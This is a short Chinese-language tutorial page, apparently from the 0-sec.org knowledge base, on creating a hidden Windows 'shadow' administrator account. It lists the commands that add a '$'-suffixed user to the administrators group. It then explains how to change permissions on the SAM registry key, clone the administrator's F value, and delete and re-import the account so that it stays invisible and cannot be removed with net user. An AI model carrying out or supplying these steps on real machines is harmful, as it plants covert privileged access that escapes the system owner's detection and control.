影子用户

影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的

在用户名后面加一个$可以创建一个匿名用户,创建完毕后我们再把这个用户添加到administrator组

net user test$ test /add
net localgroup administrators test$ /add

可以看到net user是看不到我们创建的用户,但是计算机管理-用户和组中可以看到

image

所以这时候我们就需要修改一下注册表,其键位置为:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

注意:SAM键值默认是只能system权限修改的,所以我们要修改一下SAM键的权限,给予administrator完全控制和读取的权限

image

然后我们将administrator用户对应的项中的F值复制到test$对应xiang中的F值,然后保存

image

然后我们将test$删除掉

net user test$ /del

然后再双击导出的注册表文件,然后我们再看一下

image

net user和计算机管理-用户和组中都查看不到用户了,但是我们可以用net user test$查看用户信息

这个时候我们再用net user test$ /del是删除不掉这个用户的,只能通过注册表来删除。

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-03-06 00:20:47

results matching ""

    No results matching ""